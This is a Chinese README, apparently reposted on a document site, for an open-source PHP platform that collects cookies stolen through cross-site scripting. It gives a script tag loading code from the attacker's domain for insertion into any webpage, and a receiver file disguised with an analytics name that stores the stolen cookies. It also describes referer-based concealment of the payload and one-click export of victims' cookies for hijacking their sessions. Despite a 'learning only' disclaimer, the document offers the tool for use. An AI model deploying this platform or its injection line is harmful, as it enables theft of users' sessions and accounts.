xss个人攻击测试cookie管理平台
php写的个人研究测试用的 xss cookie 攻击管理平台,开源出来
由于在实际测试中需要非常高的执行速度,所以并没有采用框架
本地测试
虚拟主机域名:xs.com
<script src="//xs.com"></script>
任意网页中插入以上代码
仅用于学习交流,禁止用于非法行为,后果自付
目录结构
www WEB部署目录(或者子目录)
├─admin 后台目录
│ ├─api.php 删除记录,与改变数据状态的请求
│ ├─auth.php 登录认证
│ ├─function.php 分页类与日期格化函数
│ ├─login.php 后台登陆
│ └─web.php 后台管理主页
|
├─asset 资源目录
│ ├─common.css 样式文件
│ └─error.gif 图标
│
├─mailer 邮件类,本项目中默认未使用到可删除
│
├─cnzz.php xs接收地址文件,用于把接收到的cookie送入数据库
├─config.php 配置文件,配置后台登录用户名,密码,数据库,以及表名
├─index.php 网站首页
└─xss.sql 默认数据库,自行导入
使用
导入xss.sql到数据库 正确的配置config.php 虚拟主机的默认首页名,指向index.php 正确的配置index.php中 js代码的接收地址,为了提高运行速度并没有在config中配置xs接收地址功能
浏览器访问主页,检测HTTP_REFERER,直接地址栏输入访问,返回错误提示 伪装 只有在源代码中点击script链接才能查看到js代码 后台管理中心点击[cookie]可以一键复制,导入到editthiscookie等工具中使用So 然而并卵
当今的互联网对xss的防范已经做得比较到位了,一般稍微像样点儿的框架都做了防护。只有测试一些古老的asp,或者一些程序员偷懒不做过滤的
版权声明:
1、该文章(资料)来源于互联网公开信息,我方只是对该内容做点评,所分享的下载地址为原作者公开地址。2、网站不提供资料下载,如需下载请到原作者页面进行下载。
3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考学习用!
4、如文档内容存在违规,或者侵犯商业秘密、侵犯著作权等,请点击“违规举报”。